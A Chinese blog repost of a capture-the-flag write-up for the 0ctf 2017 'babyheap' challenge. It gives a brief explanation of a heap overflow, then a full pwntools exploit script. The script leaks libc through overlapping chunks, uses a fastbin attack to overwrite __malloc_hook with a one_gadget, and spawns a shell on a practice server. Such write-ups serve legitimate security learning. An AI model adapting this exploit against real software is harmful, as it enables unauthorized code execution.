0ctf_2017_babyheap
作者:互联网
0ctf_2017_babyheap
查看保护
edit可以改size,堆溢出,overlapping泄露libc。fastbin attack改hook为onegadget即可getshell。overlapping和fastbin的攻击手法具体看z1r0’s blog
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1
if debug:
r = remote('node4.buuoj.cn', 27786)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
menu = 'Command: '
def add(size):
r.sendlineafter(menu, '1')
r.sendlineafter('Size: ', str(size))
def edit(index, size, content):
r.sendlineafter(menu, '2')
r.sendlineafter('Index: ', str(index))
r.sendlineafter('Size: ', str(size))
r.sendafter('Content: ', content)
def delete(index):
r.sendlineafter(menu, '3')
r.sendlineafter('Index: ', str(index))
def show(index):
r.sendlineafter(menu, '4')
r.sendlineafter('Index: ', str(index))
add(0x10) #0
add(0x40) #1
add(0x30) #2
add(0x10) #3
p1 = b'a' * 0x18 + p64(0x91)
edit(0, len(p1), p1)
delete(1)
add(0x40)
show(2)
malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 88 - 0x10
success('malloc_hook = ' + hex(malloc_hook))
libc = ELF('./libc-2.23.so')
libc_base = malloc_hook - libc.sym['__malloc_hook']
one = [0x45216, 0x4526a, 0xf03a4, 0xf1247]
one_gadget = one[1] + libc_base
add(0x30) #4
add(0x60) #5
add(0x10) #6
delete(5)
p2 = b'a' * 0x18 + p64(0x71) + p64(malloc_hook - 0x23)
edit(3, len(p2), p2)
add(0x60)
add(0x60) #7
p3 = b'\0' * 0x13 + p64(one_gadget)
edit(7, len(p3), p3)
add(0x10)
r.interactive()
标签:index,malloc,0ctf,libc,babyheap,hook,add,sendlineafter,2017 来源: https://blog.csdn.net/zzq487782568/article/details/122117896